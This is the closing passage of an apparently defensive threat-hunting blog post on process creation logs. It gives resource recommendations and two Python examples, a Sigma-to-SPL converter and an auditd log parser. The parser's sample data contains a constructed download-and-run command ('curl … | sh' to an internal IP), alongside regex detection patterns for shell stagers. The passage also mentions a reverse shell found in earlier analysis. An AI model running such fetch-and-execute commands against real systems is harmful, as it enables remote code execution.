Scdbg reveals our shellcode is a reverse shell to 10.0.254.202 on port 5555/tcp. This PowerShell script is a giant bucket of nope.
At this point we've verified that the block of PowerShell we analyzed is nothing good. That makes this about as good a starting point and hands-on example as I could hope to provide: we have walked through a false positive and a true positive, and how to analyze each.
Additional Reading and Resources
Looking for some more inspiration? Here are some projects and trainings that have helped me immensely in becoming a better threat hunter in general:
Adama – This project is pretty amazing. In short, it's a collection of hunting queries, most of them written for ELK (Elasticsearch, Logstash, Kibana) stacks, but with a little time and tinkering they can be adapted to Splunk's Search Processing Language (SPL).
JPCERT – Tool Analysis Result Sheet – JPCERT has gone through the trouble of running the tools attackers commonly use during their operations and documenting where evidence of each tool's execution can be found (event logs, registry, file system).
Sigma – Sigma is a project like Adama, but its rules are written in a YAML format that is agnostic to whatever SIEM you happen to be using. The project ships a converter (originally sigmac, now sigma-cli) that turns a Sigma rule into a query for a number of different SIEMs, including Splunk.
Practical Threat Hunting – This is a guided training by Chris Sanders. The current price to attend the training is 647.00 USD, but I feel like the price tag is worth it. There is a lot of stuff that Chris exposes you to as a part of the training. I'm not ashamed to say that this blog post is inspired by the training itself. Also, so you're aware, I am an Applied Network Defense trainer myself, and I am NOT being paid to advertise Chris' training, NOR am I being given the training for free. It's just that good.
CPTC dataset – All of this process creation log stuff sounds really awesome, but what if I want a sample dataset to practice with? This is a dataset collected from the 2019 National Collegiate Penetration Testing Competition. It will allow you to practice, experiment and demonstrate the value of these logs. Without Tom Kopchak's hard work, the screen captures accompanying this post would not have been possible. Thanks, Tom!
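To make the Sigma entry above concrete, here is a minimal Sigma-to-SPL conversion written for this post as an added example; it is not code from the original post and not the Sigma project's own converter. It handles the contains/startswith/endswith modifiers, value lists, and a "selection and not filter" condition. The rule itself, the mapping from Sigma's Sysmon-style field names to the Splunk Add-on for Windows 4688 field names, and the index/EventCode prefix are all assumptions; check them against your own field extractions before trusting the output.

```python
import re

# Constructed example rule: this dict is what yaml.safe_load() returns for a
# process_creation Sigma rule. PyYAML is left out so the block runs with the
# standard library only. Not a rule from the Sigma repository.
RULE = {
    "title": "Encoded PowerShell command line (constructed example)",
    "logsource": {"product": "windows", "category": "process_creation"},
    "detection": {
        "selection": {
            "Image|endswith": "\\powershell.exe",
            "CommandLine|contains": ["-enc", "-EncodedCommand"],
        },
        "filter": {"ParentImage|endswith": "\\explorer.exe"},
        "condition": "selection and not filter",
    },
}

# Assumed field mapping: Sigma's Sysmon-style names on the left, the names the
# Splunk Add-on for Windows extracts from Security event 4688 on the right.
# Verify against your own field extractions; they vary by TA version.
FIELD_MAP = {
    "Image": "New_Process_Name",
    "CommandLine": "Process_Command_Line",
    "ParentImage": "Creator_Process_Name",
}

# Assumed logsource prefix; point it at wherever your 4688 events are indexed.
LOGSOURCE_PREFIX = "index=wineventlog EventCode=4688"


def spl_value(value, modifier=None):
    """Quote one value for SPL and turn the Sigma modifier into wildcards.

    Backslashes are doubled because SPL treats a backslash inside double quotes
    as an escape character; a literal double quote is escaped the same way.
    """
    text = str(value).replace("\\", "\\\\").replace('"', '\\"')
    if modifier == "contains":
        text = "*" + text + "*"
    elif modifier == "startswith":
        text = text + "*"
    elif modifier == "endswith":
        text = "*" + text
    elif modifier is not None:
        raise ValueError("unsupported Sigma modifier: " + modifier)
    return '"' + text + '"'


def render_field(key, value):
    """'Field|modifier: value-or-list' -> 'field="v"' or '(field="v1" OR field="v2")'."""
    name, _, modifier = key.partition("|")
    field = FIELD_MAP.get(name, name)
    values = value if isinstance(value, list) else [value]
    terms = [field + "=" + spl_value(v, modifier or None) for v in values]
    return terms[0] if len(terms) == 1 else "(" + " OR ".join(terms) + ")"


def render_search(search):
    """One named search (a map of fields): every entry must match, so AND them."""
    return "(" + " AND ".join(render_field(k, v) for k, v in search.items()) + ")"


def sigma_to_spl(rule):
    """Expand the condition's search identifiers and boolean keywords into SPL."""
    detection = rule["detection"]
    searches = {k: v for k, v in detection.items() if k != "condition"}

    def expand(match):
        token = match.group(0)
        if token.lower() in ("and", "or", "not"):
            return token.upper()
        if token in searches:
            return render_search(searches[token])
        raise ValueError("unsupported condition token: " + token)

    # Only identifier / and / or / not / parentheses conditions are handled;
    # Sigma's '1 of selection*' and aggregation forms are not.
    body = re.sub(r"[A-Za-z_][A-Za-z0-9_]*", expand, detection["condition"])
    return LOGSOURCE_PREFIX + " " + body


if __name__ == "__main__":
    print(sigma_to_spl(RULE))
```

The backslash doubling is the part most people get wrong when hand-porting rules: a Sigma value of `\powershell.exe` has to reach Splunk as `"*\\powershell.exe"`, otherwise the search silently matches nothing. Run the output against the CPTC data with a known encoded-command event in view before you trust the conversion.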
I know that this blog post was mainly focused on process creation logs for Windows, but what about the Linux and macOS users out there? If you're looking for something similar that logs process execution data, Linux has a few options in auditd (an execve rule such as `-a always,exit -F arch=b64 -S execve -k exec` records every process execution as a SYSCALL record paired with an EXECVE record holding the arguments) and Snoopy. I only recently discovered that macOS has a native audit subsystem as well (OpenBSM). A multiplatform alternative is osquery, whose process_events table collects the same kind of data on both.
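Since auditd splits one execution across several records, the Linux equivalent of the 4688 hunting in this series starts with reassembling them. The following is an added example written for this post, not code from the original post or from the auditd project: it parses a few constructed audit.log lines, joins the SYSCALL and EXECVE records by serial number, hex-decodes the arguments auditd encodes when they contain whitespace or quotes, and then applies the same kind of command-line hunt to the result. The audit rule, the sample lines, the host IP and the URL in them are all constructed for illustration.

```python
import re
import shlex
from collections import defaultdict

# Constructed sample of /var/log/audit/audit.log lines, not from a real host.
# Assumed audit rule: -a always,exit -F arch=b64 -S execve -k exec
# auditd writes a string field as bare hex (no quotes) when it contains
# whitespace or quotes, which is why a2 below is hex; .hex() reproduces that.
_PIPED_ARG = "curl -s http://10.0.254.202/a.sh | sh".encode().hex().upper()
SAMPLE_LOG = f"""\
type=SYSCALL msg=audit(1585000000.101:4711): arch=c000003e syscall=59 success=yes exit=0 a0=55e3d4b2c1a0 ppid=1337 pid=1338 auid=1000 uid=1000 gid=1000 euid=1000 comm="bash" exe="/usr/bin/bash" key="exec"
type=EXECVE msg=audit(1585000000.101:4711): argc=3 a0="bash" a1="-c" a2={_PIPED_ARG}
type=CWD msg=audit(1585000000.101:4711): cwd="/home/user"
type=SYSCALL msg=audit(1585000000.205:4712): arch=c000003e syscall=59 success=yes exit=0 a0=55e3d4b2c2f0 ppid=1338 pid=1340 auid=1000 uid=1000 gid=1000 euid=1000 comm="ls" exe="/usr/bin/ls" key="exec"
type=EXECVE msg=audit(1585000000.205:4712): argc=2 a0="ls" a1="-la"
"""

RECORD_RE = re.compile(
    r"^type=(?P<type>\w+) msg=audit\((?P<ts>[\d.]+):(?P<serial>\d+)\): (?P<body>.*)$"
)
# key=value pairs; the value is either "quoted" or a bare token (number or hex).
FIELD_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')
HEX_RE = re.compile(r"(?:[0-9A-Fa-f]{2})+")
# String fields auditd hex-encodes when needed. a0..aN are strings only in
# EXECVE records; in SYSCALL records they are raw syscall arguments.
HEX_STRING_KEYS = {"comm", "exe", "cwd", "proctitle", "name"}


def decode_value(record_type, key, raw):
    """Strip quotes, or hex-decode a string field that auditd chose to encode."""
    if raw.startswith('"') and raw.endswith('"'):
        return raw[1:-1]
    is_argv = record_type == "EXECVE" and re.fullmatch(r"a\d+", key)
    if (is_argv or key in HEX_STRING_KEYS) and HEX_RE.fullmatch(raw):
        return bytes.fromhex(raw).decode("utf-8", errors="replace")
    return raw


def parse_audit_log(text):
    """Group records by serial: {serial: {record_type: {field: value}}}.

    A long argv makes auditd emit several EXECVE records with the same serial,
    so records of one type are merged rather than replaced. Single arguments
    split into chunks (a2[0]=, a2[1]=) are not reassembled here.
    """
    events = defaultdict(dict)
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        rtype = m.group("type")
        fields = {k: decode_value(rtype, k, v) for k, v in FIELD_RE.findall(m.group("body"))}
        fields["_ts"] = m.group("ts")
        events[m.group("serial")].setdefault(rtype, {}).update(fields)
    return events


def exec_events(text):
    """One process-creation record per execve, joined from SYSCALL and EXECVE."""
    out = []
    for serial, recs in parse_audit_log(text).items():
        sc, ex = recs.get("SYSCALL"), recs.get("EXECVE")
        if not sc or not ex:
            continue
        arg_keys = sorted((k for k in ex if re.fullmatch(r"a\d+", k)), key=lambda k: int(k[1:]))
        argv = [ex[k] for k in arg_keys]
        out.append({
            "serial": serial, "ts": float(sc["_ts"]),
            "pid": int(sc["pid"]), "ppid": int(sc["ppid"]),
            "uid": int(sc["uid"]), "auid": int(sc["auid"]),
            "exe": sc["exe"], "argv": argv,
            "cmdline": shlex.join(argv),          # shell-quoted, like 4688's command line
            "argc_ok": int(ex["argc"]) == len(argv),  # False if a record was lost
        })
    return sorted(out, key=lambda e: e["ts"])


# The same kinds of command-line tells hunted for in the 4688 data above.
SUSPICIOUS = [
    re.compile(r"\|\s*(?:ba)?sh\b"),                  # piping into a shell
    re.compile(r"\bbase64\b.*(?:-d|--decode)"),       # decoding a staged payload
    re.compile(r"\b(?:curl|wget)\b.*\b(?:ba)?sh\b"),  # download-and-run
]


def hunt(text):
    """Return the exec events whose reconstructed command line looks like a stager."""
    return [e for e in exec_events(text) if any(p.search(e["cmdline"]) for p in SUSPICIOUS)]


if __name__ == "__main__":
    for e in hunt(SAMPLE_LOG):
        print(f"{e['ts']} pid={e['pid']} ppid={e['ppid']} uid={e['uid']} {e['cmdline']}")
```

Two caveats worth keeping in mind when you do this on real data: never hex-decode by appearance alone (a pid of 1338 is valid hex, and SYSCALL's a0..a3 are pointers), and check argc against the number of arguments you recovered, because a dropped EXECVE record under load will otherwise hand you a truncated command line that looks perfectly benign.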
We have covered a lot of ground in these three blog posts–getting you familiar with process creation logs, getting them into Splunk for analysis, and then learning how to query them to discover anomalies. We’ve gone through a hands-on example together, and I’ve left you with a handful of resources you can use to jumpstart your threat hunting activities.
Bear in mind that if you choose to follow along with me, the CPTC dataset is massive, and there is a ton of other data in it you can analyze as well. Also keep in mind that the CPTC dataset is not the only Splunk dataset out there: Splunk provides data for both the Boss of the SOC 1 and Boss of the SOC 2 competitions.
Good luck, and happy hunting.